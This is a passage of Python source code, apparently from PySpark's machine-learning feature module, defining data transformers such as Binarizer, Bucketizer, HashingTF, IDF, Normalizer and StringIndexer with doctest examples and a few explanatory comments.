>>> params = {binarizer.threshold: -0.5, binarizer.outputCol: "vector"}
>>> binarizer.transform(df, params).head().vector
1.0
"""
# a placeholder to make it appear in the generated doc
threshold = Param(Params._dummy(), "threshold",
"threshold in binary classification prediction, in range [0, 1]")
@keyword_only
def __init__(self, threshold=0.0, inputCol=None, outputCol=None):
"""
__init__(self, threshold=0.0, inputCol=None, outputCol=None)
"""
super(Binarizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Binarizer", self.uid)
self.threshold = Param(self, "threshold",
"threshold in binary classification prediction, in range [0, 1]")
self._setDefault(threshold=0.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, threshold=0.0, inputCol=None, outputCol=None):
"""
setParams(self, threshold=0.0, inputCol=None, outputCol=None)
Sets params for this Binarizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setThreshold(self, value):
"""
Sets the value of :py:attr:`threshold`.
"""
self._paramMap[self.threshold] = value
return self
def getThreshold(self):
"""
Gets the value of threshold or its default value.
"""
return self.getOrDefault(self.threshold)
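# Hedged note (added for illustration; not part of the original source): Binarizer
# emits 1.0 for values strictly greater than the threshold and 0.0 otherwise, which
# is why 0.5 maps to 0.0 with threshold=1.0 but to 1.0 once the threshold is
# lowered to -0.5 in the doctest above.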
@inherit_doc
class Bucketizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Maps a column of continuous features to a column of feature buckets.
>>> df = sqlContext.createDataFrame([(0.1,), (0.4,), (1.2,), (1.5,)], ["values"])
>>> bucketizer = Bucketizer(splits=[-float("inf"), 0.5, 1.4, float("inf")],
... inputCol="values", outputCol="buckets")
>>> bucketed = bucketizer.transform(df).collect()
>>> bucketed[0].buckets
0.0
>>> bucketed[1].buckets
0.0
>>> bucketed[2].buckets
1.0
>>> bucketed[3].buckets
2.0
>>> bucketizer.setParams(outputCol="b").transform(df).head().b
0.0
"""
# a placeholder to make it appear in the generated doc
splits = \
Param(Params._dummy(), "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
@keyword_only
def __init__(self, splits=None, inputCol=None, outputCol=None):
"""
__init__(self, splits=None, inputCol=None, outputCol=None)
"""
super(Bucketizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Bucketizer", self.uid)
#: param for Splitting points for mapping continuous features into buckets. With n+1 splits,
# there are n buckets. A bucket defined by splits x,y holds values in the range [x,y)
# except the last bucket, which also includes y. The splits should be strictly increasing.
# Values at -inf, inf must be explicitly provided to cover all Double values; otherwise,
# values outside the splits specified will be treated as errors.
self.splits = \
Param(self, "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, splits=None, inputCol=None, outputCol=None):
"""
setParams(self, splits=None, inputCol=None, outputCol=None)
Sets params for this Bucketizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setSplits(self, value):
"""
Sets the value of :py:attr:`splits`.
"""
self._paramMap[self.splits] = value
return self
def getSplits(self):
"""
        Gets the value of splits or its default value.
"""
return self.getOrDefault(self.splits)
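# Hedged note (added for illustration; not part of the original source): with splits
# [-inf, 0.5, 1.4, inf] the doctest above defines three buckets, [-inf, 0.5) -> 0.0,
# [0.5, 1.4) -> 1.0 and [1.4, inf] -> 2.0. If the infinite endpoints were omitted,
# transforming a value outside the splits (e.g. 1.5) would be treated as an error.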
@inherit_doc
class DCT(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that takes the 1D discrete cosine transform
of a real vector. No zero padding is performed on the input vector.
It returns a real vector of the same length representing the DCT.
The return vector is scaled such that the transform matrix is
unitary (aka scaled DCT-II).
    More information is available at
    `https://en.wikipedia.org/wiki/Discrete_cosine_transform#DCT-II Wikipedia`.
>>> from pyspark.mllib.linalg import Vectors
>>> df1 = sqlContext.createDataFrame([(Vectors.dense([5.0, 8.0, 6.0]),)], ["vec"])
>>> dct = DCT(inverse=False, inputCol="vec", outputCol="resultVec")
>>> df2 = dct.transform(df1)
>>> df2.head().resultVec
DenseVector([10.969..., -0.707..., -2.041...])
>>> df3 = DCT(inverse=True, inputCol="resultVec", outputCol="origVec").transform(df2)
>>> df3.head().origVec
DenseVector([5.0, 8.0, 6.0])
"""
# a placeholder to make it appear in the generated doc
inverse = Param(Params._dummy(), "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
@keyword_only
def __init__(self, inverse=False, inputCol=None, outputCol=None):
"""
__init__(self, inverse=False, inputCol=None, outputCol=None)
"""
super(DCT, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.DCT", self.uid)
self.inverse = Param(self, "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
self._setDefault(inverse=False)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inverse=False, inputCol=None, outputCol=None):
"""
setParams(self, inverse=False, inputCol=None, outputCol=None)
Sets params for this DCT.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setInverse(self, value):
"""
Sets the value of :py:attr:`inverse`.
"""
self._paramMap[self.inverse] = value
return self
def getInverse(self):
"""
Gets the value of inverse or its default value.
"""
return self.getOrDefault(self.inverse)
@inherit_doc
class ElementwiseProduct(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Outputs the Hadamard product (i.e., the element-wise product) of each input vector
with a provided "weight" vector. In other words, it scales each column of the dataset
by a scalar multiplier.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([2.0, 1.0, 3.0]),)], ["values"])
>>> ep = ElementwiseProduct(scalingVec=Vectors.dense([1.0, 2.0, 3.0]),
... inputCol="values", outputCol="eprod")
>>> ep.transform(df).head().eprod
DenseVector([2.0, 2.0, 9.0])
>>> ep.setParams(scalingVec=Vectors.dense([2.0, 3.0, 5.0])).transform(df).head().eprod
DenseVector([4.0, 3.0, 15.0])
"""
# a placeholder to make it appear in the generated doc
scalingVec = Param(Params._dummy(), "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
@keyword_only
def __init__(self, scalingVec=None, inputCol=None, outputCol=None):
"""
__init__(self, scalingVec=None, inputCol=None, outputCol=None)
"""
super(ElementwiseProduct, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.ElementwiseProduct",
self.uid)
self.scalingVec = Param(self, "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, scalingVec=None, inputCol=None, outputCol=None):
"""
setParams(self, scalingVec=None, inputCol=None, outputCol=None)
Sets params for this ElementwiseProduct.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setScalingVec(self, value):
"""
Sets the value of :py:attr:`scalingVec`.
"""
self._paramMap[self.scalingVec] = value
return self
def getScalingVec(self):
"""
Gets the value of scalingVec or its default value.
"""
return self.getOrDefault(self.scalingVec)
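# Hedged arithmetic check (added for illustration; not part of the original source):
# the doctest above computes the Hadamard product element-wise,
# [2.0, 1.0, 3.0] * [1.0, 2.0, 3.0] = [2.0, 2.0, 9.0].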
@inherit_doc
class HashingTF(JavaTransformer, HasInputCol, HasOutputCol, HasNumFeatures):
"""
.. note:: Experimental
Maps a sequence of terms to their term frequencies using the
hashing trick.
>>> df = sqlContext.createDataFrame([(["a", "b", "c"],)], ["words"])
>>> hashingTF = HashingTF(numFeatures=10, inputCol="words", outputCol="features")
>>> hashingTF.transform(df).head().features
SparseVector(10, {7: 1.0, 8: 1.0, 9: 1.0})
>>> hashingTF.setParams(outputCol="freqs").transform(df).head().freqs
SparseVector(10, {7: 1.0, 8: 1.0, 9: 1.0})
>>> params = {hashingTF.numFeatures: 5, hashingTF.outputCol: "vector"}
>>> hashingTF.transform(df, params).head().vector
SparseVector(5, {2: 1.0, 3: 1.0, 4: 1.0})
"""
@keyword_only
def __init__(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
"""
__init__(self, numFeatures=1 << 18, inputCol=None, outputCol=None)
"""
super(HashingTF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.HashingTF", self.uid)
self._setDefault(numFeatures=1 << 18)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
"""
setParams(self, numFeatures=1 << 18, inputCol=None, outputCol=None)
Sets params for this HashingTF.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
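# Hedged note (added for illustration; not part of the original source): the hashing
# trick maps each term to the slot hash(term) % numFeatures and accumulates its count
# there, so no vocabulary has to be built first. Distinct terms can collide into the
# same slot, and shrinking numFeatures (as in the params doctest above) changes which
# indices the terms land on.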
@inherit_doc
class IDF(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Compute the Inverse Document Frequency (IDF) given a collection of documents.
>>> from pyspark.mllib.linalg import DenseVector
>>> df = sqlContext.createDataFrame([(DenseVector([1.0, 2.0]),),
... (DenseVector([0.0, 1.0]),), (DenseVector([3.0, 0.2]),)], ["tf"])
>>> idf = IDF(minDocFreq=3, inputCol="tf", outputCol="idf")
>>> idf.fit(df).transform(df).head().idf
DenseVector([0.0, 0.0])
>>> idf.setParams(outputCol="freqs").fit(df).transform(df).collect()[1].freqs
DenseVector([0.0, 0.0])
>>> params = {idf.minDocFreq: 1, idf.outputCol: "vector"}
>>> idf.fit(df, params).transform(df).head().vector
DenseVector([0.2877, 0.0])
"""
# a placeholder to make it appear in the generated doc
    minDocFreq = Param(Params._dummy(), "minDocFreq",
                       "minimum number of documents in which a term should appear for filtering")
@keyword_only
def __init__(self, minDocFreq=0, inputCol=None, outputCol=None):
"""
__init__(self, minDocFreq=0, inputCol=None, outputCol=None)
"""
super(IDF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IDF", self.uid)
        self.minDocFreq = Param(self, "minDocFreq",
                                "minimum number of documents in which a term should appear for filtering")
self._setDefault(minDocFreq=0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minDocFreq=0, inputCol=None, outputCol=None):
"""
setParams(self, minDocFreq=0, inputCol=None, outputCol=None)
Sets params for this IDF.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinDocFreq(self, value):
"""
Sets the value of :py:attr:`minDocFreq`.
"""
self._paramMap[self.minDocFreq] = value
return self
def getMinDocFreq(self):
"""
Gets the value of minDocFreq or its default value.
"""
return self.getOrDefault(self.minDocFreq)
def _create_model(self, java_model):
return IDFModel(java_model)
class IDFModel(JavaModel):
"""
.. note:: Experimental
Model fitted by IDF.
"""
@inherit_doc
@ignore_unicode_prefix
class NGram(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that converts the input array of strings into an array of n-grams. Null
values in the input array are ignored.
It returns an array of n-grams where each n-gram is represented by a space-separated string of
words.
When the input is empty, an empty array is returned.
When the input array length is less than n (number of elements per n-gram), no n-grams are
returned.
>>> df = sqlContext.createDataFrame([Row(inputTokens=["a", "b", "c", "d", "e"])])
>>> ngram = NGram(n=2, inputCol="inputTokens", outputCol="nGrams")
>>> ngram.transform(df).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], nGrams=[u'a b', u'b c', u'c d', u'd e'])
>>> # Change n-gram length
>>> ngram.setParams(n=4).transform(df).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], nGrams=[u'a b c d', u'b c d e'])
>>> # Temporarily modify output column.
>>> ngram.transform(df, {ngram.outputCol: "output"}).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], output=[u'a b c d', u'b c d e'])
>>> ngram.transform(df).head()
Row(inputTokens=[u'a', u'b', u'c', u'd', u'e'], nGrams=[u'a b c d', u'b c d e'])
>>> # Must use keyword arguments to specify params.
>>> ngram.setParams("text")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
"""
# a placeholder to make it appear in the generated doc
n = Param(Params._dummy(), "n", "number of elements per n-gram (>=1)")
@keyword_only
def __init__(self, n=2, inputCol=None, outputCol=None):
"""
__init__(self, n=2, inputCol=None, outputCol=None)
"""
super(NGram, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.NGram", self.uid)
self.n = Param(self, "n", "number of elements per n-gram (>=1)")
self._setDefault(n=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, n=2, inputCol=None, outputCol=None):
"""
setParams(self, n=2, inputCol=None, outputCol=None)
Sets params for this NGram.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setN(self, value):
"""
Sets the value of :py:attr:`n`.
"""
self._paramMap[self.n] = value
return self
def getN(self):
"""
Gets the value of n or its default value.
"""
return self.getOrDefault(self.n)
@inherit_doc
class Normalizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Normalize a vector to have unit norm using the given p-norm.
>>> from pyspark.mllib.linalg import Vectors
>>> svec = Vectors.sparse(4, {1: 4.0, 3: 3.0})
>>> df = sqlContext.createDataFrame([(Vectors.dense([3.0, -4.0]), svec)], ["dense", "sparse"])
>>> normalizer = Normalizer(p=2.0, inputCol="dense", outputCol="features")
>>> normalizer.transform(df).head().features
DenseVector([0.6, -0.8])
>>> normalizer.setParams(inputCol="sparse", outputCol="freqs").transform(df).head().freqs
SparseVector(4, {1: 0.8, 3: 0.6})
>>> params = {normalizer.p: 1.0, normalizer.inputCol: "dense", normalizer.outputCol: "vector"}
>>> normalizer.transform(df, params).head().vector
DenseVector([0.4286, -0.5714])
"""
# a placeholder to make it appear in the generated doc
p = Param(Params._dummy(), "p", "the p norm value.")
@keyword_only
def __init__(self, p=2.0, inputCol=None, outputCol=None):
"""
__init__(self, p=2.0, inputCol=None, outputCol=None)
"""
super(Normalizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Normalizer", self.uid)
self.p = Param(self, "p", "the p norm value.")
self._setDefault(p=2.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, p=2.0, inputCol=None, outputCol=None):
"""
setParams(self, p=2.0, inputCol=None, outputCol=None)
Sets params for this Normalizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setP(self, value):
"""
Sets the value of :py:attr:`p`.
"""
self._paramMap[self.p] = value
return self
def getP(self):
"""
Gets the value of p or its default value.
"""
return self.getOrDefault(self.p)
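# Hedged arithmetic check (added for illustration; not part of the original source):
# for the dense vector [3.0, -4.0] the L2 norm is sqrt(9 + 16) = 5, giving
# [0.6, -0.8], and the L1 norm is |3| + |-4| = 7, giving roughly [0.4286, -0.5714],
# matching the doctest outputs above.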
@inherit_doc
class OneHotEncoder(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A one-hot encoder that maps a column of category indices to a
column of binary vectors, with at most a single one-value per row
that indicates the input category index.
For example with 5 categories, an input value of 2.0 would map to
an output vector of `[0.0, 0.0, 1.0, 0.0]`.
The last category is not included by default (configurable via
:py:attr:`dropLast`) because it makes the vector entries sum up to
one, and hence linearly dependent.
So an input value of 4.0 maps to `[0.0, 0.0, 0.0, 0.0]`.
Note that this is different from scikit-learn's OneHotEncoder,
which keeps all categories.
The output vectors are sparse.
.. seealso::
:py:class:`StringIndexer` for converting categorical values into
category indices
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> model = stringIndexer.fit(stringIndDf)
>>> td = model.transform(stringIndDf)
>>> encoder = OneHotEncoder(inputCol="indexed", outputCol="features")
>>> encoder.transform(td).head().features
SparseVector(2, {0: 1.0})
>>> encoder.setParams(outputCol="freqs").transform(td).head().freqs
SparseVector(2, {0: 1.0})
>>> params = {encoder.dropLast: False, encoder.outputCol: "test"}
>>> encoder.transform(td, params).head().test
SparseVector(3, {0: 1.0})
"""
# a placeholder to make it appear in the generated doc
dropLast = Param(Params._dummy(), "dropLast", "whether to drop the last category")
@keyword_only
def __init__(self, dropLast=True, inputCol=None, outputCol=None):
"""
        __init__(self, dropLast=True, inputCol=None, outputCol=None)
"""
super(OneHotEncoder, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.OneHotEncoder", self.uid)
self.dropLast = Param(self, "dropLast", "whether to drop the last category")
self._setDefault(dropLast=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, dropLast=True, inputCol=None, outputCol=None):
"""
setParams(self, dropLast=True, inputCol=None, outputCol=None)
Sets params for this OneHotEncoder.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDropLast(self, value):
"""
Sets the value of :py:attr:`dropLast`.
"""
self._paramMap[self.dropLast] = value
return self
def getDropLast(self):
"""
Gets the value of dropLast or its default value.
"""
return self.getOrDefault(self.dropLast)
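# Hedged illustration (added; not part of the original source): with three categories
# and the default dropLast=True, index 0.0 -> [1.0, 0.0], 1.0 -> [0.0, 1.0] and
# 2.0 -> [0.0, 0.0]; with dropLast=False the last category keeps its own slot, so
# 2.0 -> [0.0, 0.0, 1.0]. Dropping the last column prevents the encoded columns from
# always summing to one (perfect collinearity).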
@inherit_doc
class PolynomialExpansion(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
    Perform feature expansion in a polynomial space. As described on the Wikipedia page for
    polynomial expansion (`http://en.wikipedia.org/wiki/Polynomial_expansion`), "In mathematics, an
    expansion of a product of sums expresses it as a sum of products by using the fact that
    multiplication distributes over addition". For example, expanding the 2-variable feature vector
    `(x, y)` with degree 2 yields `(x, x * x, y, x * y, y * y)`.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([0.5, 2.0]),)], ["dense"])
>>> px = PolynomialExpansion(degree=2, inputCol="dense", outputCol="expanded")
>>> px.transform(df).head().expanded
DenseVector([0.5, 0.25, 2.0, 1.0, 4.0])
>>> px.setParams(outputCol="test").transform(df).head().test
DenseVector([0.5, 0.25, 2.0, 1.0, 4.0])
"""
# a placeholder to make it appear in the generated doc
degree = Param(Params._dummy(), "degree", "the polynomial degree to expand (>= 1)")
@keyword_only
def __init__(self, degree=2, inputCol=None, outputCol=None):
"""
__init__(self, degree=2, inputCol=None, outputCol=None)
"""
super(PolynomialExpansion, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.feature.PolynomialExpansion", self.uid)
self.degree = Param(self, "degree", "the polynomial degree to expand (>= 1)")
self._setDefault(degree=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, degree=2, inputCol=None, outputCol=None):
"""
setParams(self, degree=2, inputCol=None, outputCol=None)
Sets params for this PolynomialExpansion.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDegree(self, value):
"""
Sets the value of :py:attr:`degree`.
"""
self._paramMap[self.degree] = value
return self
def getDegree(self):
"""
Gets the value of degree or its default value.
"""
return self.getOrDefault(self.degree)
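# Hedged arithmetic check (added for illustration; not part of the original source):
# expanding (x, y) = (0.5, 2.0) with degree 2 yields
# (x, x * x, y, x * y, y * y) = (0.5, 0.25, 2.0, 1.0, 4.0), which is the doctest output.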
@inherit_doc
@ignore_unicode_prefix
class RegexTokenizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A regex based tokenizer that extracts tokens either by using the
provided regex pattern (in Java dialect) to split the text
(default) or repeatedly matching the regex (if gaps is false).
Optional parameters also allow filtering tokens using a minimal
length.
It returns an array of strings that can be empty.
>>> df = sqlContext.createDataFrame([("a b c",)], ["text"])
>>> reTokenizer = RegexTokenizer(inputCol="text", outputCol="words")
>>> reTokenizer.transform(df).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> # Change a parameter.
>>> reTokenizer.setParams(outputCol="tokens").transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Temporarily modify a parameter.
>>> reTokenizer.transform(df, {reTokenizer.outputCol: "words"}).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> reTokenizer.transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Must use keyword arguments to specify params.
>>> reTokenizer.setParams("text")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
"""
# a placeholder to make it appear in the generated doc
minTokenLength = Param(Params._dummy(), "minTokenLength", "minimum token length (>= 0)")
gaps = Param(Params._dummy(), "gaps", "whether regex splits on gaps (True) or matches tokens")
pattern = Param(Params._dummy(), "pattern", "regex pattern (Java dialect) used for tokenizing")
@keyword_only
def __init__(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
"""
__init__(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None)
"""
super(RegexTokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RegexTokenizer", self.uid)
self.minTokenLength = Param(self, "minTokenLength", "minimum token length (>= 0)")
self.gaps = Param(self, "gaps", "whether regex splits on gaps (True) or matches tokens")
self.pattern = Param(self, "pattern", "regex pattern (Java dialect) used for tokenizing")
self._setDefault(minTokenLength=1, gaps=True, pattern="\\s+")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
"""
setParams(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None)
Sets params for this RegexTokenizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinTokenLength(self, value):
"""
Sets the value of :py:attr:`minTokenLength`.
"""
self._paramMap[self.minTokenLength] = value
return self
def getMinTokenLength(self):
"""
Gets the value of minTokenLength or its default value.
"""
return self.getOrDefault(self.minTokenLength)
def setGaps(self, value):
"""
Sets the value of :py:attr:`gaps`.
"""
self._paramMap[self.gaps] = value
return self
def getGaps(self):
"""
Gets the value of gaps or its default value.
"""
return self.getOrDefault(self.gaps)
def setPattern(self, value):
"""
Sets the value of :py:attr:`pattern`.
"""
self._paramMap[self.pattern] = value
return self
def getPattern(self):
"""
Gets the value of pattern or its default value.
"""
return self.getOrDefault(self.pattern)
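# Hedged illustration (added; not part of the original source): with the defaults
# (gaps=True, pattern="\\s+") the pattern is used to *split* the text, so "a b  c"
# tokenizes to ["a", "b", "c"]; with gaps=False and a pattern such as "\\w+" the
# pattern is *matched* repeatedly instead, yielding the tokens themselves.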
@inherit_doc
class SQLTransformer(JavaTransformer):
"""
.. note:: Experimental
    Implements the transforms that are defined by a SQL statement.
Currently we only support SQL syntax like 'SELECT ... FROM __THIS__'
where '__THIS__' represents the underlying table of the input dataset.
>>> df = sqlContext.createDataFrame([(0, 1.0, 3.0), (2, 2.0, 5.0)], ["id", "v1", "v2"])
>>> sqlTrans = SQLTransformer(
... statement="SELECT *, (v1 + v2) AS v3, (v1 * v2) AS v4 FROM __THIS__")
>>> sqlTrans.transform(df).head()
Row(id=0, v1=1.0, v2=3.0, v3=4.0, v4=3.0)
"""
# a placeholder to make it appear in the generated doc
statement = Param(Params._dummy(), "statement", "SQL statement")
@keyword_only
def __init__(self, statement=None):
"""
__init__(self, statement=None)
"""
super(SQLTransformer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.SQLTransformer", self.uid)
self.statement = Param(self, "statement", "SQL statement")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, statement=None):
"""
setParams(self, statement=None)
Sets params for this SQLTransformer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStatement(self, value):
"""
Sets the value of :py:attr:`statement`.
"""
self._paramMap[self.statement] = value
return self
def getStatement(self):
"""
Gets the value of statement or its default value.
"""
return self.getOrDefault(self.statement)
@inherit_doc
class StandardScaler(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
Standardizes features by removing the mean and scaling to unit variance using column summary
statistics on the samples in the training set.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([0.0]),), (Vectors.dense([2.0]),)], ["a"])
>>> standardScaler = StandardScaler(inputCol="a", outputCol="scaled")
>>> model = standardScaler.fit(df)
>>> model.mean
DenseVector([1.0])
>>> model.std
DenseVector([1.4142])
>>> model.transform(df).collect()[1].scaled
DenseVector([1.4142])
"""
# a placeholder to make it appear in the generated doc
withMean = Param(Params._dummy(), "withMean", "Center data with mean")
withStd = Param(Params._dummy(), "withStd", "Scale to unit standard deviation")
@keyword_only
def __init__(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
"""
__init__(self, withMean=False, withStd=True, inputCol=None, outputCol=None)
"""
super(StandardScaler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StandardScaler", self.uid)
self.withMean = Param(self, "withMean", "Center data with mean")
self.withStd = Param(self, "withStd", "Scale to unit standard deviation")
self._setDefault(withMean=False, withStd=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, withMean=False, withStd=True, inputCol=None, outputCol=None):
"""
setParams(self, withMean=False, withStd=True, inputCol=None, outputCol=None)
Sets params for this StandardScaler.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setWithMean(self, value):
"""
Sets the value of :py:attr:`withMean`.
"""
self._paramMap[self.withMean] = value
return self
def getWithMean(self):
"""
Gets the value of withMean or its default value.
"""
return self.getOrDefault(self.withMean)
def setWithStd(self, value):
"""
Sets the value of :py:attr:`withStd`.
"""
self._paramMap[self.withStd] = value
return self
def getWithStd(self):
"""
Gets the value of withStd or its default value.
"""
return self.getOrDefault(self.withStd)
def _create_model(self, java_model):
return StandardScalerModel(java_model)
class StandardScalerModel(JavaModel):
"""
.. note:: Experimental
Model fitted by StandardScaler.
"""
@property
def std(self):
"""
Standard deviation of the StandardScalerModel.
"""
return self._call_java("std")
@property
def mean(self):
"""
Mean of the StandardScalerModel.
"""
return self._call_java("mean")
@inherit_doc
class StringIndexer(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A label indexer that maps a string column of labels to an ML column of label indices.
If the input column is numeric, we cast it to string and index the string values.
The indices are in [0, numLabels), ordered by label frequencies.
So the most frequent label gets index 0.
>>> stringIndexer = StringIndexer(inputCol="label", outputCol="indexed")
>>> model = stringIndexer.fit(stringIndDf)
>>> td = model.transform(stringIndDf)
>>> sorted(set([(i[0], i[1]) for i in td.select(td.id, td.indexed).collect()]),
... key=lambda x: x[0])
[(0, 0.0), (1, 2.0), (2, 1.0), (3, 0.0), (4, 0.0), (5, 1.0)]
>>> inverter = IndexToString(inputCol="indexed", outputCol="label2", labels=model.labels())
>>> itd = inverter.transform(td)
>>> sorted(set([(i[0], str(i[1])) for i in itd.select(itd.id, itd.label2).collect()]),
... key=lambda x: x[0])
[(0, 'a'), (1, 'b'), (2, 'c'), (3, 'a'), (4, 'a'), (5, 'c')]
"""
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
"""
__init__(self, inputCol=None, outputCol=None)
"""
super(StringIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StringIndexer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
"""
setParams(self, inputCol=None, outputCol=None)
Sets params for this StringIndexer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def _create_model(self, java_model):
return StringIndexerModel(java_model)
class StringIndexerModel(JavaModel):
"""
.. note:: Experimental
Model fitted by StringIndexer.
"""
@property
def labels(self):
"""
Ordered list of labels, corresponding to indices to be assigned.
"""
return self._java_obj.labels
@inherit_doc
class IndexToString(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A :py:class:`Transformer` that maps a column of string indices back to a new column of
    corresponding string values, using either the ML attributes of the input column or,
    if provided, the labels supplied by the user.
All original columns are kept during transformation.
See L{StringIndexer} for converting strings into indices.
"""
# a placeholder to make the labels show up in generated doc
labels = Param(Params._dummy(), "labels",
"Optional array of labels to be provided by the user, if not supplied or " +
"empty, column metadata is read for labels")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, labels=None):
"""
__init__(self, inputCol=None, outputCol=None, labels=None)
"""
super(IndexToString, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IndexToString",
self.uid)
self.labels = Param(self, "labels",
"Optional array of labels to be provided by the user, if not " +
"supplied or empty, column metadata is read for labels")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, labels=None):
"""
setParams(self, inputCol=None, outputCol=None, labels=None)
Sets params for this IndexToString.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setLabels(self, value):
"""
Sets the value of :py:attr:`labels`.
"""
self._paramMap[self.labels] = value
return self
def getLabels(self):
"""
Gets the value of :py:attr:`labels` or its default value.
"""
return self.getOrDefault(self.labels)
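

# Illustrative usage sketch (not part of the original module): mapping label indices
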